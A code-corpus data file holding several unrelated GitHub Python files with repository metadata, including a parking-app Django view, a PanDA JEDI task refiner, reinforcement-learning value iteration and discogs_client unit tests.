k = pair_wise_si_snr.squeeze(1).squeeze(1)
# print(k.size())
loss = 0 - torch.mean(k)
return loss
def get_loss_func(loss_type):
if loss_type == 'logmae_wav':
return logmae_wav
elif loss_type == 'mae':
return mae
elif loss_type == 'si_snr':
return max_si_snr
elif loss_type == 'mse':
return torch.nn.MSELoss()
else:
raise Exception('Incorrect loss_type!') | RetroCirce/Choral_Music_Separation | losses.py | losses.py | py | 2,000 | python | en | code | 29 | github-code | 1 | [
{
"api_name": "torch.mean",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.abs",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "torch.log10",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.clamp",
"line_number": 11,
... |
70521367394 | # -*- coding: utf-8 -*-
"""
A new file.
"""
import numpy as np
from numba import jit, vectorize
from utils import timeit
from loops import loop1
@timeit
def loop(m, n):
s = 0
for i in range(1, m + 1):
for j in range(1, n + 1):
s += 1.0 / i + 1.0 / j
return s
@timeit
def loopcxx(m, n):
return loop1(m, n)
@timeit
@jit
def loop_jit(m, n):
s = 0
for i in range(1, m + 1):
for j in range(1, n + 1):
s += 1.0 / i + 1.0 / j
return s
@timeit
@vectorize(['float64(int64, int64)'])
def loop_vec(m, n):
s = 0
for i in range(1, m + 1):
for j in range(1, n + 1):
s += 1.0 / i + 1.0 / j
return s
def main():
m = 10000
n = 1000
r = loop(m, n)
r1 = loopcxx(m, n)
r_jit = loop_jit(m, n)
r_vec = loop_vec(m, n)
print(r, r1, r_jit, r_vec)
if __name__ == '__main__':
print('running...')
main()
| cmjdxy/fundamental-demos | study-parallel-computing/jit_vs_vec.py | jit_vs_vec.py | py | 983 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "utils.timeit",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "loops.loop1",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "utils.timeit",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "utils.timeit",
"line_number... |
37932432698 | from kivymd.uix.button import MDIconButton
from kivy.app import App
from kivy.properties import (
AliasProperty,
BooleanProperty,
ListProperty,
NumericProperty,
ObjectProperty,
StringProperty,
)
class MDIconButtonTwoPosition(MDIconButton):
enabled = True
sourceEnabled = StringProperty()
sourceDisabled = StringProperty()
triggerFunction = ObjectProperty()
arguments = ObjectProperty()
def on_release(self):
if self.enabled == True:
self.enabled = False
else:
self.enabled = True
self.change_source()
if self.triggerFunction != None:
self.triggerFunction(self.arguments,self.enabled)
def change_source(self):
if self.enabled == True:
self.icon = self.sourceEnabled
else:
self.icon = self.sourceDisabled | andrimation/Android_Social_App | andorid_app/app_files/MDIconButtonTwoPosition/MDIconButtonTwoPosition.py | MDIconButtonTwoPosition.py | py | 867 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "kivymd.uix.button.MDIconButton",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "kivy.properties.StringProperty",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "kivy.properties.StringProperty",
"line_number": 15,
"usage_type": "call"
... |
40173689508 | from django.shortcuts import render, redirect
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from .models import *
from realtime.models import InAndOut
from .decorators import user_required, get_park_time
'''用户端 - 我的'''
@user_required
def personal(request, user):
ctx = { 'menu': 'personal'}
print(user.wechat_user().head_img)
ctx['user'] = user
return render(request, 'public_count/personal/my.html', ctx)
@user_required
def mybill(request, user, id=None):
ctx = {}
if id:
ctx['r'] = r = InAndOut.objects.filter(id=id).first()
if r:
ctx['hours1'] = get_park_time(r.in_time, r.out_time)
ctx['hours2'] = get_park_time(r.out_time, r.final_out_time)
return render(request, 'public_count/personal/bill-detail.html', ctx)
return render(request, 'public_count/personal/mybill.html', ctx)
@user_required
def mycard(request, user):
ctx = {}
from chargerule.models import Card
plates = MyPlate.objects.filter(user=user)
plates = [i.plate for i in plates]
if plates:
ctx['cards'] = Card.objects.filter(car_number__in=plates)
return render(request, 'public_count/personal/mycard.html', ctx)
@user_required
def mycoupon(request, user):
ctx = {}
return render(request, 'public_count/personal/mycoupon.html', ctx)
@user_required
def myplate(request, user):
ctx = {}
plates = MyPlate.objects.filter(user=user)
if request.method == 'POST':
action = request.POST.get('action')
if action == 'bound':
plate = request.POST.get('plate', '')
MyPlate.objects.get_or_create(user=user, plate=plate)
elif action == 'unbound':
id = request.POST.get('id', '')
MyPlate.objects.filter(id=id).delete()
return redirect('/wechat/personal/myplate/')
ctx['plates'] = plates
return render(request, 'public_count/personal/myplate.html', ctx)
@user_required
def bound(request, user):
return render(request, 'public_count/personal/bound.html')
@user_required
def problem(request, user):
if request.method == 'POST':
car_number = request.POST.get('car_number', '')
gate_id = request.POST.get('gate', '')
parkinglot_id = request.POST.get('parkinglot', '')
p = Problem(user=user, plate=car_number, parkinglot_id=parkinglot_id)
if gate_id:
p.gate_id = gate_id
p.save()
return render(request, 'public_count/problem.html')
@user_required
def scan_coupon(request, user, id, code):
from chargerule.models import TicketRecord, UserCoupon
ctx = {}
r = TicketRecord.objects.filter(id=id)
if r.exists():
r = r.first()
if r.qrrandom == code:
from business.views import ran
r.qrrandom = ran()
r.save()
UserCoupon.objects.create(user=user, ticket_record=r.first())
else:
ctx['error'] = '二维码已过期'
coupons = UserCoupon.objects.select_related('ticket_record', 'ticket_record__coupons').filter(status=0).order_by('-create_time')
return render(request, 'public_count/personal/mycoupon.html', ctx)
| codefish-yu/parking | parking/wechat/my.py | my.py | py | 2,952 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.shortcuts.render",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "decorators.user_required",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "realtime.models.InAndOut.objects.filter",
"line_number": 29,
"usage_type": "call"
},
... |
30298059185 |
class Nellix2ssdf:
def __init__(self,dicom_basedir,ptcode,ctcode,basedir):
import imageio
#import easygui
from stentseg.utils.datahandling import loadvol
from stentseg.utils.datahandling import savecropvols, saveaveraged
## Select base directory for LOADING DICOM data
#dicom_basedir = easygui.diropenbox()
print('DICOM Path = ', dicom_basedir)
#ctcode = '12months' # 'pre', 'post_x', '12months'
stenttype = 'nellix'
## Select base directory to SAVE SSDF
#basedir = easygui.diropenbox()
print('Base Path = ', basedir)
# Set which crops to save
cropnames = ['prox'] #,'stent'] # ['ring'] or ['ring','stent'] or ..
#===============================================================================
## Step A: read single volumes to get vols:
# folder1 = '10%'
# folder2 = '60%'
# vol1 = imageio.volread(os.path.join(dicom_basedir, folder1), 'dicom')
# vol2 = imageio.volread(os.path.join(dicom_basedir, folder2), 'dicom')
# print( )
#
# if vol1.meta.SeriesDescription[:2] < vol2.meta.SeriesDescription[:2]:
# vols4078 = [vol1,vol2]
# else:
# vols4078 = [vol2,vol1]
#
# vols = vols4078.copy()
#
# for vol in vols:
# vol.meta.PatientName = ptcode # anonimyze
# vol.meta.PatientID = 'anonymous'
# print(vol.meta.SeriesDescription,'-', vol.meta.sampling)
#===============================================================================
##Orginele code
#===============================================================================
#
# folder1 = '40% iDose'
# folder2 = '78 iDose'
# vol1 = imageio.volread(os.path.join(dicom_basedir, folder1), 'dicom')
# vol2 = imageio.volread(os.path.join(dicom_basedir, folder2), 'dicom')
# print( )
#
# if vol1.meta.SeriesDescription[:2] < vol2.meta.SeriesDescription[:2]:
# vols4078 = [vol1,vol2]
# else:
# vols4078 = [vol2,vol1]
#
# vols = vols4078.copy()
#
# for vol in vols:
# vol.meta.PatientName = ptcode # anonimyze
# vol.meta.PatientID = 'anonymous'
# print(vol.meta.SeriesDescription,'-', vol.meta.sampling)
#===============================================================================
## Step A: read 10 volumes to get vols
# Deze zoekt alle mappen en dat zijn er dus 10 maar niet in de goede volgorde
vols2 = [vol2 for vol2 in imageio.get_reader(dicom_basedir, 'DICOM', 'V')]
vols = [None] * len(vols2)
for i, vol in enumerate(vols2):
# print(vol.meta.sampling)
print(vol.meta.SeriesDescription)
phase = int(vol.meta.SeriesDescription[:1])
# use phase to fix order of phases
vols[phase] = vol
#vols[phase].meta.ImagePositionPatient = (0.0,0.0,0.0)
for i,vol in enumerate(vols): #wat ik heb veranderd is i, en enumerate()
print(vol.meta.SeriesDescription)
assert vol.shape == vols[0].shape
assert str(i*10) in vol.meta.SeriesDescription # 0% , 10% etc.
## Step B: Crop and Save SSDF
# 1 of 2 cropnames opgeven voor opslaan 1 of 2 crpos.
# Het eerste volume wordt geladen in MIP, crop met marges van minimaal 30 mm
for cropname in cropnames:
savecropvols(vols, basedir, ptcode, ctcode, cropname, stenttype)
# saveaveraged(basedir, ptcode, ctcode, cropname, range(0,100,10))
## Visualize result
#s1 = loadvol(basedir, ptcode, ctcode, cropnames[0], what ='10avgreg')
#s2 = loadvol(basedir, ptcode, ctcode, cropnames[0], what ='10phases')
s1 = loadvol(basedir, ptcode, ctcode, cropnames[0], what ='phases')
#s2 = loadvol(basedir, ptcode, ctcode, cropnames[0], what = 'avg010')
#vol1 = s1.vol
vol1 = s1.vol40
# Visualize and compare
colormap = {'r': [(0.0, 0.0), (0.17727272, 1.0)],
'g': [(0.0, 0.0), (0.27272728, 1.0)],
'b': [(0.0, 0.0), (0.34545454, 1.0)],
'a': [(0.0, 1.0), (1.0, 1.0)]}
import visvis as vv
fig = vv.figure(1); vv.clf()
fig.position = 0, 22, 1366, 706
a1 = vv.subplot(111)
a1.daspect = 1, 1, -1
# t1 = vv.volshow(vol1, clim=(0, 3000), renderStyle='iso') # iso or mip
# t1.isoThreshold = 600 # stond op 400 maar je moet hoger zetten als je alleen stent wil
# t1.colormap = colormap
a1 = vv.volshow2(vol1, clim=(-500, 1500),renderStyle='mip')
vv.xlabel('x'), vv.ylabel('y'), vv.zlabel('z')
# vv.title('One volume at %i procent of cardiac cycle' % phase )
vv.title('Vol40' )
| almarklein/stentseg | nellix/nellix2ssdf.py | nellix2ssdf.py | py | 5,174 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "imageio.get_reader",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "stentseg.utils.datahandling.savecropvols",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "stentseg.utils.datahandling.loadvol",
"line_number": 100,
"usage_type": "call... |
7455827350 | import datetime
import sys
import time
import traceback
# logger
from pandacommon.pandalogger.PandaLogger import PandaLogger
from pandajedi.jediconfig import jedi_config
from pandajedi.jedicore import Interaction, JediException
from pandajedi.jedicore.FactoryBase import FactoryBase
from pandajedi.jedicore.JediDatasetSpec import JediDatasetSpec
from pandajedi.jedicore.JediTaskSpec import JediTaskSpec
from pandajedi.jedicore.MsgWrapper import MsgWrapper
from pandajedi.jedicore.ThreadUtils import ListWithLock, ThreadPool, WorkerThread
from pandajedi.jedirefine import RefinerUtils
from .JediKnight import JediKnight
logger = PandaLogger().getLogger(__name__.split(".")[-1])
# worker class to refine TASK_PARAM to fill JEDI tables
class TaskRefiner(JediKnight, FactoryBase):
# constructor
def __init__(self, commuChannel, taskBufferIF, ddmIF, vos, prodSourceLabels):
self.vos = self.parseInit(vos)
self.prodSourceLabels = self.parseInit(prodSourceLabels)
JediKnight.__init__(self, commuChannel, taskBufferIF, ddmIF, logger)
FactoryBase.__init__(self, self.vos, self.prodSourceLabels, logger, jedi_config.taskrefine.modConfig)
# main
def start(self):
# start base classes
JediKnight.start(self)
FactoryBase.initializeMods(self, self.taskBufferIF, self.ddmIF)
# go into main loop
while True:
startTime = datetime.datetime.utcnow()
try:
# get logger
tmpLog = MsgWrapper(logger)
tmpLog.debug("start")
# loop over all vos
for vo in self.vos:
# loop over all sourceLabels
for prodSourceLabel in self.prodSourceLabels:
# get the list of tasks to refine
tmpList = self.taskBufferIF.getTasksToRefine_JEDI(vo, prodSourceLabel)
if tmpList is None:
# failed
tmpLog.error("failed to get the list of tasks to refine")
else:
tmpLog.debug(f"got {len(tmpList)} tasks")
# put to a locked list
taskList = ListWithLock(tmpList)
# make thread pool
threadPool = ThreadPool()
# get work queue mapper
workQueueMapper = self.taskBufferIF.getWorkQueueMap()
# make workers
nWorker = jedi_config.taskrefine.nWorkers
for iWorker in range(nWorker):
thr = TaskRefinerThread(taskList, threadPool, self.taskBufferIF, self.ddmIF, self, workQueueMapper)
thr.start()
# join
threadPool.join()
except Exception:
errtype, errvalue = sys.exc_info()[:2]
tmpLog.error(f"failed in {self.__class__.__name__}.start() with {errtype.__name__} {errvalue}")
tmpLog.error(f"Traceback: {traceback.format_exc()}")
# sleep if needed
loopCycle = jedi_config.taskrefine.loopCycle
timeDelta = datetime.datetime.utcnow() - startTime
sleepPeriod = loopCycle - timeDelta.seconds
if sleepPeriod > 0:
time.sleep(sleepPeriod)
# randomize cycle
self.randomSleep(max_val=loopCycle)
# thread for real worker
class TaskRefinerThread(WorkerThread):
# constructor
def __init__(self, taskList, threadPool, taskbufferIF, ddmIF, implFactory, workQueueMapper):
# initialize woker with no semaphore
WorkerThread.__init__(self, None, threadPool, logger)
# attributres
self.taskList = taskList
self.taskBufferIF = taskbufferIF
self.ddmIF = ddmIF
self.implFactory = implFactory
self.workQueueMapper = workQueueMapper
self.msgType = "taskrefiner"
# main
def runImpl(self):
while True:
try:
# get a part of list
nTasks = 10
taskList = self.taskList.get(nTasks)
# no more datasets
if len(taskList) == 0:
self.logger.info(f"{self.__class__.__name__} terminating since no more items")
return
# loop over all tasks
for jediTaskID, splitRule, taskStatus, parent_tid in taskList:
# make logger
tmpLog = MsgWrapper(self.logger, f"< jediTaskID={jediTaskID} >")
tmpLog.debug("start")
tmpStat = Interaction.SC_SUCCEEDED
errStr = ""
# read task parameters
try:
taskParam = None
taskParam = self.taskBufferIF.getTaskParamsWithID_JEDI(jediTaskID)
taskParamMap = RefinerUtils.decodeJSON(taskParam)
except Exception:
errtype, errvalue = sys.exc_info()[:2]
errStr = f"conversion to map from json failed with {errtype.__name__}:{errvalue}"
tmpLog.debug(taskParam)
tmpLog.error(errStr)
continue
tmpStat = Interaction.SC_FAILED
# get impl
if tmpStat == Interaction.SC_SUCCEEDED:
tmpLog.info("getting Impl")
try:
# get VO and sourceLabel
vo = taskParamMap["vo"]
prodSourceLabel = taskParamMap["prodSourceLabel"]
taskType = taskParamMap["taskType"]
tmpLog.info(f"vo={vo} sourceLabel={prodSourceLabel} taskType={taskType}")
# get impl
impl = self.implFactory.instantiateImpl(vo, prodSourceLabel, taskType, self.taskBufferIF, self.ddmIF)
if impl is None:
# task refiner is undefined
errStr = f"task refiner is undefined for vo={vo} sourceLabel={prodSourceLabel}"
tmpLog.error(errStr)
tmpStat = Interaction.SC_FAILED
except Exception:
errtype, errvalue = sys.exc_info()[:2]
errStr = f"failed to get task refiner with {errtype.__name__}:{errvalue}"
tmpLog.error(errStr)
tmpStat = Interaction.SC_FAILED
# extract common parameters
if tmpStat == Interaction.SC_SUCCEEDED:
tmpLog.info("extracting common")
try:
# initalize impl
impl.initializeRefiner(tmpLog)
impl.oldTaskStatus = taskStatus
# extract common parameters
impl.extractCommon(jediTaskID, taskParamMap, self.workQueueMapper, splitRule)
# set parent tid
if parent_tid not in [None, jediTaskID]:
impl.taskSpec.parent_tid = parent_tid
except Exception:
errtype, errvalue = sys.exc_info()[:2]
# on hold in case of external error
if errtype == JediException.ExternalTempError:
tmpErrStr = f"pending due to external problem. {errvalue}"
setFrozenTime = True
impl.taskSpec.status = taskStatus
impl.taskSpec.setOnHold()
impl.taskSpec.setErrDiag(tmpErrStr)
# not to update some task attributes
impl.taskSpec.resetRefinedAttrs()
tmpLog.info(tmpErrStr)
self.taskBufferIF.updateTask_JEDI(
impl.taskSpec,
{"jediTaskID": impl.taskSpec.jediTaskID},
oldStatus=[taskStatus],
insertUnknown=impl.unknownDatasetList,
setFrozenTime=setFrozenTime,
)
continue
errStr = f"failed to extract common parameters with {errtype.__name__}:{errvalue} {traceback.format_exc()}"
tmpLog.error(errStr)
tmpStat = Interaction.SC_FAILED
# check attribute length
if tmpStat == Interaction.SC_SUCCEEDED:
tmpLog.info("checking attribute length")
if not impl.taskSpec.checkAttrLength():
tmpLog.error(impl.taskSpec.errorDialog)
tmpStat = Interaction.SC_FAILED
# staging
if tmpStat == Interaction.SC_SUCCEEDED:
if "toStaging" in taskParamMap and taskStatus not in ["staged", "rerefine"]:
errStr = "wait until staging is done"
impl.taskSpec.status = "staging"
impl.taskSpec.oldStatus = taskStatus
impl.taskSpec.setErrDiag(errStr)
# not to update some task attributes
impl.taskSpec.resetRefinedAttrs()
tmpLog.info(errStr)
self.taskBufferIF.updateTask_JEDI(
impl.taskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus], updateDEFT=False, setFrozenTime=False
)
continue
# check parent
noWaitParent = False
parentState = None
if tmpStat == Interaction.SC_SUCCEEDED:
if parent_tid not in [None, jediTaskID]:
tmpLog.info("check parent task")
try:
tmpStat = self.taskBufferIF.checkParentTask_JEDI(parent_tid)
parentState = tmpStat
if tmpStat == "completed":
# parent is done
tmpStat = Interaction.SC_SUCCEEDED
elif tmpStat is None or tmpStat == "running":
if not impl.taskSpec.noWaitParent():
# parent is running
errStr = f"pending until parent task {parent_tid} is done"
impl.taskSpec.status = taskStatus
impl.taskSpec.setOnHold()
impl.taskSpec.setErrDiag(errStr)
# not to update some task attributes
impl.taskSpec.resetRefinedAttrs()
tmpLog.info(errStr)
self.taskBufferIF.updateTask_JEDI(
impl.taskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus], setFrozenTime=False
)
continue
else:
# not wait for parent
tmpStat = Interaction.SC_SUCCEEDED
noWaitParent = True
else:
# parent is corrupted
tmpStat = Interaction.SC_FAILED
tmpErrStr = f"parent task {parent_tid} failed to complete"
impl.taskSpec.setErrDiag(tmpErrStr)
except Exception:
errtype, errvalue = sys.exc_info()[:2]
errStr = f"failed to check parent task with {errtype.__name__}:{errvalue}"
tmpLog.error(errStr)
tmpStat = Interaction.SC_FAILED
# refine
if tmpStat == Interaction.SC_SUCCEEDED:
tmpLog.info(f"refining with {impl.__class__.__name__}")
try:
tmpStat = impl.doRefine(jediTaskID, taskParamMap)
except Exception:
errtype, errvalue = sys.exc_info()[:2]
# wait unknown input if noWaitParent or waitInput
toFinish = False
if (
((impl.taskSpec.noWaitParent() or impl.taskSpec.waitInput()) and errtype == JediException.UnknownDatasetError)
or parentState == "running"
or errtype == Interaction.JEDITemporaryError
):
if impl.taskSpec.noWaitParent() and errtype == JediException.UnknownDatasetError and parentState != "running":
if impl.taskSpec.allowEmptyInput():
tmpErrStr = f"finishing due to missing input while parent is {parentState}"
toFinish = True
setFrozenTime = False
else:
tmpErrStr = f"pending due to missing input while parent is {parentState}"
setFrozenTime = True
elif impl.taskSpec.noWaitParent() or parentState == "running":
tmpErrStr = f"pending until parent produces input. parent is {parentState}"
setFrozenTime = False
elif errtype == Interaction.JEDITemporaryError:
tmpErrStr = f"pending due to DDM problem. {errvalue}"
setFrozenTime = True
else:
tmpErrStr = "pending until input is staged"
setFrozenTime = True
if toFinish:
impl.taskSpec.status = "finishing"
else:
impl.taskSpec.status = taskStatus
impl.taskSpec.setOnHold()
impl.taskSpec.setErrDiag(tmpErrStr)
# not to update some task attributes
impl.taskSpec.resetRefinedAttrs()
tmpLog.info(tmpErrStr)
self.taskBufferIF.updateTask_JEDI(
impl.taskSpec,
{"jediTaskID": impl.taskSpec.jediTaskID},
oldStatus=[taskStatus],
insertUnknown=impl.unknownDatasetList,
setFrozenTime=setFrozenTime,
)
continue
elif (
not (impl.taskSpec.noWaitParent() or impl.taskSpec.waitInput())
and errtype == JediException.UnknownDatasetError
and impl.taskSpec.allowEmptyInput()
):
impl.taskSpec.status = "finishing"
tmpErrStr = f"finishing due to missing input after parent is {parentState}"
impl.taskSpec.setErrDiag(tmpErrStr)
# not to update some task attributes
impl.taskSpec.resetRefinedAttrs()
tmpLog.info(tmpErrStr)
self.taskBufferIF.updateTask_JEDI(
impl.taskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus], insertUnknown=impl.unknownDatasetList
)
continue
else:
errStr = f"failed to refine task with {errtype.__name__}:{errvalue}"
tmpLog.error(errStr)
tmpStat = Interaction.SC_FAILED
# register
if tmpStat != Interaction.SC_SUCCEEDED:
tmpLog.error("failed to refine the task")
if impl is None or impl.taskSpec is None:
tmpTaskSpec = JediTaskSpec()
tmpTaskSpec.jediTaskID = jediTaskID
else:
tmpTaskSpec = impl.taskSpec
tmpTaskSpec.status = "tobroken"
if errStr != "":
tmpTaskSpec.setErrDiag(errStr, True)
self.taskBufferIF.updateTask_JEDI(tmpTaskSpec, {"jediTaskID": tmpTaskSpec.jediTaskID}, oldStatus=[taskStatus])
else:
tmpLog.info("registering")
# fill JEDI tables
try:
# enable protection against task duplication
if "uniqueTaskName" in taskParamMap and taskParamMap["uniqueTaskName"] and not impl.taskSpec.checkPreProcessed():
uniqueTaskName = True
else:
uniqueTaskName = False
strTaskParams = None
if impl.updatedTaskParams is not None:
strTaskParams = RefinerUtils.encodeJSON(impl.updatedTaskParams)
if taskStatus in ["registered", "staged"]:
# unset pre-process flag
if impl.taskSpec.checkPreProcessed():
impl.taskSpec.setPostPreProcess()
# full registration
tmpStat, newTaskStatus = self.taskBufferIF.registerTaskInOneShot_JEDI(
jediTaskID,
impl.taskSpec,
impl.inMasterDatasetSpec,
impl.inSecDatasetSpecList,
impl.outDatasetSpecList,
impl.outputTemplateMap,
impl.jobParamsTemplate,
strTaskParams,
impl.unmergeMasterDatasetSpec,
impl.unmergeDatasetSpecMap,
uniqueTaskName,
taskStatus,
)
if not tmpStat:
tmpErrStr = "failed to register the task to JEDI in a single shot"
tmpLog.error(tmpErrStr)
tmpTaskSpec = JediTaskSpec()
tmpTaskSpec.status = newTaskStatus
tmpTaskSpec.errorDialog = impl.taskSpec.errorDialog
tmpTaskSpec.setErrDiag(tmpErrStr, True)
self.taskBufferIF.updateTask_JEDI(tmpTaskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus])
tmpMsg = f"set task_status={newTaskStatus}"
tmpLog.info(tmpMsg)
tmpLog.sendMsg(tmpMsg, self.msgType)
# send message to contents feeder if the task is registered
if tmpStat and impl.taskSpec.is_msg_driven():
push_ret = self.taskBufferIF.push_task_trigger_message("jedi_contents_feeder", jediTaskID)
if push_ret:
tmpLog.debug("pushed trigger message to jedi_contents_feeder")
else:
tmpLog.warning("failed to push trigger message to jedi_contents_feeder")
else:
# disable scouts if previous attempt didn't use it
if not impl.taskSpec.useScout(splitRule):
impl.taskSpec.setUseScout(False)
# disallow to reset some attributes
impl.taskSpec.reserve_old_attributes()
# update task with new params
self.taskBufferIF.updateTask_JEDI(impl.taskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus])
# appending for incremental execution
tmpStat = self.taskBufferIF.appendDatasets_JEDI(jediTaskID, impl.inMasterDatasetSpec, impl.inSecDatasetSpecList)
if not tmpStat:
tmpLog.error("failed to append datasets for incexec")
except Exception:
errtype, errvalue = sys.exc_info()[:2]
tmpErrStr = f"failed to register the task to JEDI with {errtype.__name__}:{errvalue}"
tmpLog.error(tmpErrStr)
else:
tmpLog.info("done")
except Exception:
errtype, errvalue = sys.exc_info()[:2]
logger.error(f"{self.__class__.__name__} failed in runImpl() with {errtype.__name__}:{errvalue}")
# lauch
def launcher(commuChannel, taskBufferIF, ddmIF, vos=None, prodSourceLabels=None):
p = TaskRefiner(commuChannel, taskBufferIF, ddmIF, vos, prodSourceLabels)
p.start()
| PanDAWMS/panda-jedi | pandajedi/jediorder/TaskRefiner.py | TaskRefiner.py | py | 23,185 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "pandacommon.pandalogger.PandaLogger.PandaLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "JediKnight.JediKnight",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "pandajedi.jedicore.FactoryBase.FactoryBase",
"line_number": 23,
"us... |
16077958011 | from typing import Tuple
import numpy as np
from env import EnvWithModel
from policy import Policy
def value_prediction(env: EnvWithModel, pi: Policy, initV: np.array, theta: float) -> Tuple[np.array, np.array]:
"""
inp:
env: environment with model information, i.e. you know transition dynamics and reward function
pi: policy
initV: initial V(s); numpy array shape of [nS,]
theta: exit criteria
return:
V: $v_\pi$ function; numpy array shape of [nS]
Q: $q_\pi$ function; numpy array shape of [nS,nA]
"""
#####################
# Implement Value Prediction Algorithm (Hint: Sutton Book p.75)
#####################
# Cache the action prob matrix
action_prob_mat = np.array([[pi.action_prob(s, a) for s in range(env.spec.nS)] for a in range(env.spec.nA)])
# Init optimization variables
V = initV.copy()
# Loop to update the value prediction
while True:
Delta = 0 # maximal update error
for s in range(env.spec.nS):
v = V[s]
pi_vec = action_prob_mat[:, s]
p_mat = env.TD[s, :, :]
r_mat = env.R[s, :, :]
return_mat = pi_vec[:, np.newaxis] * p_mat * (r_mat + env.spec.gamma * V[np.newaxis, :])
V[s] = return_mat.sum()
Delta = max(Delta, np.abs(V[s] - v))
if Delta < theta:
break
# Now use the value prediction to estimate action-value
Q = (env.TD * (env.R + env.spec.gamma * V[np.newaxis, np.newaxis, :])).sum(axis=-1)
return V, Q
def value_iteration(env: EnvWithModel, initV: np.array, theta: float) -> Tuple[np.array, Policy]:
"""
inp:
env: environment with model information, i.e. you know transition dynamics and reward function
initV: initial V(s); numpy array shape of [nS,]
theta: exit criteria
return:
value: optimal value function; numpy array shape of [nS]
policy: optimal deterministic policy; instance of Policy class
"""
#####################
# Implement Value Iteration Algorithm (Hint: Sutton Book p.83)
#####################
# Init optimization variables
V = initV.copy()
# Loop to update the value prediction of optimal policy
while True:
Delta = 0 # maximal update error
for s in range(env.spec.nS):
v = V[s]
p_mat = env.TD[s, :, :]
r_mat = env.R[s, :, :]
return_mat = (p_mat * (r_mat + env.spec.gamma * V[np.newaxis, :])).sum(axis=1).max()
V[s] = return_mat.sum()
Delta = max(Delta, np.abs(V[s] - v))
if Delta < theta:
break
# Compute the optimal policy that yields the value estimate
class MyPolicy(Policy):
def __init__(self, pi_mat):
self.pi_mat = pi_mat
def action_prob(self, state: int, action: int) -> float:
return self.pi_mat[state, action]
def action(self, state: int) -> int:
return self.pi_mat[state, :].argmax()
pi_mat = (env.TD * (env.R + env.spec.gamma * V[np.newaxis, np.newaxis, :])).sum(axis=2)
pi = MyPolicy(pi_mat)
return V, pi
| owen8877/Sp22-CS394R | prog2/dp.py | dp.py | py | 3,187 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "env.EnvWithModel",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "policy.Policy",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_... |
25820215342 | from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from discogs_client import Client
from discogs_client.tests import DiscogsClientTestCase
from discogs_client.exceptions import ConfigurationError, HTTPError
from datetime import datetime
class CoreTestCase(DiscogsClientTestCase):
def test_user_agent(self):
"""User-Agent should be properly set"""
self.d.artist(1).name
bad_client = Client('')
self.assertRaises(ConfigurationError, lambda: bad_client.artist(1).name)
try:
bad_client.artist(1).name
except ConfigurationError as e:
self.assertTrue('User-Agent' in str(e))
def test_caching(self):
"""Only perform a fetch when requesting missing data"""
a = self.d.artist(1)
self.assertEqual(a.id, 1)
self.assertTrue(self.d._fetcher.last_request is None)
self.assertEqual(a.name, 'Persuader, The')
self.assertGot('/artists/1')
self.assertEqual(a.real_name, 'Jesper Dahlb\u00e4ck')
self.assertEqual(len(self.d._fetcher.requests), 1)
# Get a key that's not in our cache
a.fetch('blorf')
self.assertEqual(len(self.d._fetcher.requests), 2)
self.assertTrue('blorf' in a._known_invalid_keys)
# Now we know artists don't have blorves
a.fetch('blorf')
self.assertEqual(len(self.d._fetcher.requests), 2)
def test_equality(self):
"""APIObjects of the same class are equal if their IDs are"""
a1 = self.d.artist(1)
a1_ = self.d.artist(1)
self.d.artist(2)
r1 = self.d.release(1)
self.assertEqual(a1, a1_)
self.assertEqual(a1, r1.artists[0])
self.assertNotEqual(a1, r1)
self.assertNotEqual(r1, ':D')
def test_transform_datetime(self):
"""String timestamps are converted to datetimes"""
registered = self.d.user('example').registered
self.assertTrue(isinstance(registered, datetime))
def test_object_field(self):
"""APIObjects can have APIObjects as properties"""
self.assertEqual(self.d.master(4242).main_release, self.d.release(79))
def test_read_only_simple_field(self):
"""Can't write to a SimpleField when writable=False"""
u = self.d.user('example')
def fail():
u.rank = 9001
self.assertRaises(AttributeError, fail)
def test_read_only_object_field(self):
"""Can't write to an ObjectField"""
m = self.d.master(4242)
def fail():
m.main_release = 'lol!'
self.assertRaises(AttributeError, fail)
def test_pagination(self):
"""PaginatedLists are parsed correctly, indexable, and iterable"""
results = self.d.artist(1).releases
self.assertEqual(results.per_page, 50)
self.assertEqual(results.pages, 2)
self.assertEqual(results.count, 57)
self.assertEqual(len(results), 57)
self.assertEqual(len(results.page(1)), 50)
self.assertRaises(HTTPError, lambda: results.page(42))
try:
results.page(42)
except HTTPError as e:
self.assertEqual(e.status_code, 404)
self.assertRaises(IndexError, lambda: results[3141592])
self.assertEqual(results[0].id, 20209)
self.assertTrue(self.d.release(20209) in results)
# Changing pagination settings invalidates the cache
results.per_page = 10
self.assertTrue(results._num_pages is None)
def suite():
suite = unittest.TestSuite()
suite = unittest.TestLoader().loadTestsFromTestCase(CoreTestCase)
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| discogs/discogs_client | discogs_client/tests/test_core.py | test_core.py | py | 3,753 | python | en | code | 481 | github-code | 1 | [
{
"api_name": "discogs_client.tests.DiscogsClientTestCase",
